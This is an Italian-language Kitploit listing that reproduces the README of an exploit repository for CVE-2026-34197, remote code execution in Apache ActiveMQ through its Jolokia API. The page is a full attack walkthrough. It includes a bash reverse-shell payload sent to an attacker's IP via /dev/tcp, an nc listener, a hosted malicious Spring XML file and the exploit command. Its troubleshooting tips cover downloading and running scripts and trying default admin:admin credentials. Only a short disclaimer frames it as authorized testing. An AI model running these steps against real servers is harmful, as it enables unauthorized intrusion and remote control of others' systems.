Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-34197-payload-Apache-ActiveMQ- — Script di exploit per CVE-2026-34197, che prende di mira l'API Jolokia di Apache ActiveMQ per ottenere l'esecuzione remota di codice tramite una configurazione Spring XML dannosa, con capacità di reverse shell. | Kitploit
Strumenti/GitHubGitHub/xshysjhq/cve-2026-34197-payload-apache-activemq-
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingStrumento di Accesso RemotoSviluppo Payload
GitHubxshysjhq/cve-2026-34197-payload-apache-activemq-

CVE-2026-34197-payload-Apache-ActiveMQ-

Script di exploit per CVE-2026-34197, che prende di mira l'API Jolokia di Apache ActiveMQ per ottenere l'esecuzione remota di codice tramite una configurazione Spring XML dannosa, con capacità di reverse shell.

Vedi Repository
14 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Guida alla riproduzione della vulnerabilità RCE di ActiveMQ Jolokia

Questo repository fornisce un ambiente di riproduzione e uno script di exploit per la vulnerabilità di esecuzione remota di codice (RCE) basata sull'interfaccia API Jolokia esposta di Apache ActiveMQ (/api/jolokia/). Tramite l'operazione addNetworkConnector, si forza ActiveMQ a risolvere un file di configurazione Spring XML remoto creato ad hoc, sfruttando MethodInvokingFactoryBean per eseguire comandi di sistema.

📁 File inclusi

  • payload.py: script principale di exploit, invia richieste HTTP POST con un nome Broker dinamico.
  • payload.xml: file di configurazione Spring Bean dannoso, contenente il payload del comando per la reverse shell.

🛠️ Preparazione dell'ambiente

  1. Ambiente Python 3
  2. Installare le dipendenze:
    root@kitploit:~
    pip install requests
    
  3. Macchina attaccante (es. server cloud): deve disporre di un IP pubblico, essere in grado di aprire la porta del servizio HTTP e la porta di ascolto per la reverse shell.
  4. Macchina target: servizio ActiveMQ vulnerabile (es. immagine Docker apache/activemq-classic:6.1.0).

🚀 Passaggi per la riproduzione

1. Configurare il payload dell'attacco (payload.xml)

Sulla macchina attaccante, aprire payload.xml e individuare la sezione seguente:

root@kitploit:~
<value>bash -c 'bash -i >& /dev/tcp/IL_VOSTRO_IP_SERVER_CLOUD/15000 0>&1'</value>

Sostituire l'IP con l'IP pubblico del vostro server cloud. Se nell'ambiente target non è presente bash, modificare il comando in sh o in un altro metodo di esecuzione in base all'ambiente target.

2. Avviare l'ascolto per la reverse shell

Sulla macchina attaccante (server cloud), aprire un terminale e mettersi in ascolto sulla porta specificata (es. 15000):

root@kitploit:~
nc -lvvp 15000

Nota: assicurarsi che il security group/firewall del server cloud abbia consentito il traffico TCP in ingresso sulla porta 15000.

3. Avviare il servizio HTTP per ospitare il payload

Sulla macchina attaccante (nella stessa directory di payload.xml), avviare un server HTTP per consentire al target di scaricare il file XML:

root@kitploit:~
python3 -m http.server 9000

Nota: assicurarsi anche qui che il security group/firewall del server cloud abbia consentito il traffico TCP in ingresso sulla porta 9000.

4. Eseguire lo script di exploit

Sulla macchina locale (o sulla macchina attaccante), eseguire payload.py. Lo script supporta il passaggio tramite parametri da riga di comando dell'IP:porta del target ActiveMQ (-t) e dell'IP:porta della macchina attaccante che ospita l'XML (-a).

root@kitploit:~
python payload.py -t 192.168.0.1:8161 -a 8.8.8.8:9000

Dopo l'esecuzione, lo script genererà automaticamente un brokerName casuale (es. rce_a1b2c3), risolvendo completamente l'errore di conflitto di nomi java.io.IOException : Network Connector could not be registered in JMX.

5. Ottenere la shell

Se l'exploit ha successo:

  1. Il vostro server HTTP (python3 -m http.server 9000) mostrerà una richiesta GET 200 per /payload.xml.
  2. Il vostro listener nc riceverà una connessione di reverse shell dalla macchina target.

⚠️ Risoluzione dei problemi comuni

  1. XML ottenuto con successo (HTTP 200), ma nessuna shell ricevuta:
    • Causa A: il security group del server cloud ha bloccato la reverse shell (traffico in ingresso sulla porta 15000 non consentito).
    • Causa B: nel container target non è presente il comando /bin/bash (comune in immagini base minimaliste come Alpine). Modificare il comando di esecuzione in payload.xml in /bin/sh, oppure scaricare uno script tramite wget/curl ed eseguirlo.
  2. Errore 401 Unauthorized dal target:
  • Causa: le versioni più recenti di ActiveMQ / Jolokia richiedono l'autenticazione con nome utente e password.
  • Soluzione: se si utilizzano le credenziali predefinite, aggiungere Basic Auth alla richiesta (es. admin:admin).

🛡️ Disclaimer

Questo script e queste istruzioni sono destinati esclusivamente a test di sicurezza autorizzati e a scopi educativi. È severamente vietato l'uso per test illegali non autorizzati. L'utente è responsabile delle proprie azioni.

Scarica lo strumento